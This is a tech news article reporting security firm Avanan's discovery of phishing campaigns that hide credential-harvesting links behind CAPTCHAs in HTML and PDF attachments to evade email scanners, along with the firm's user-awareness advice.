IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

Hackers spotted using CAPTCHAs to dodge email security scanners

The technique allows hackers to hide malicious links in HTML files

A CAPTCHA verification check on a data entry field

A new phishing campaign has been discovered using CAPTCHA verification tests to bypass email security scanners.

CAPTCHAs are cognitive tests that websites present to ensure that they're interacting with humans rather than automated bots.

According to cyber security company Avanan, the new campaign is using a technique that the company itself demonstrated over a year ago to bypass secure email gateways.

Email scanners typically compare links in emails against a known list of malicious domains gathered from threat intelligence feeds and blacklists. Sending a CAPTCHA instead of a direct URL effectively masks the phishing link from automated checks, as it takes human interaction to solve.

Phishing emails using CAPTCHAs will attach them as HMTL files that look clean to a secure email gateway, Avanan said. Some email clients might even render the HTML file when displaying the message if they can't find anything dangerous about it.

If a victim opens the HTML file containing a CAPTCHA and solves it, the browser will then show them a phishing page asking them to enter their credentials.

Avanan has found attackers using this technique when sending emails from legitimate domains. In one case, the company said that a criminal used a compromised university domain to send an email containing a CAPTCHA.

Instead of embedding the test in an HTML file, the attacker uses a non-password-protected PDF purporting to be a faxed document. When opened, the PDF takes the user to a site with a CAPTCHA.

Upon solving the CAPTCHA, the phishing site presents the victim with a fake Microsoft authentication window asking for their login credentials.

Attackers typically use Google's reCAPTCHA service, which it provides free to developers. Because security scanning systems can't realistically block Google, the reCAPTCHA is sure to be delivered, Avanan explains. Using a spoofed Microsoft OneDrive site adds another layer of apparent legitimacy to the phishing attack, researchers added.

Avanan's best practices for avoiding the attack focus on user awareness rather than technical solutions.

Users should check URLs before filling out CAPTCHA forms, it said. They should also ask whether the PDF should have been password protected, and query the sender to find if they were in the office or working from home. "If working form home, odds are that they did not fax it," the company concluded.

Featured Resources

The state of Salesforce: Future of business

Three articles that look forward into the changing state of Salesforce and the future of business

Free Download

The mighty struggle to migrate SAP to the cloud may be over

A simplified and unified approach to delivering Enterprise Transformation in the cloud

Free Download

The business value of the transformative mainframe

Modernising on the mainframe

Free Download

The Total Economic Impact™ Of IBM FlashSystem

Cost savings and business benefits enabled by FlashSystem

Free Download

Recommended

Education and government most at risk from email threats
phishing

Education and government most at risk from email threats

26 Nov 2021
Attackers use CSS to fool anti-phishing systems
phishing

Attackers use CSS to fool anti-phishing systems

11 Nov 2021

Most Popular

How to boot Windows 11 in Safe Mode
Microsoft Windows

How to boot Windows 11 in Safe Mode

29 Jul 2022
Cyber attack on software supplier causes "major outage" across the NHS
cyber attacks

Cyber attack on software supplier causes "major outage" across the NHS

8 Aug 2022
Should you take your password manager off the internet?
Sponsored

Should you take your password manager off the internet?

28 Jul 2022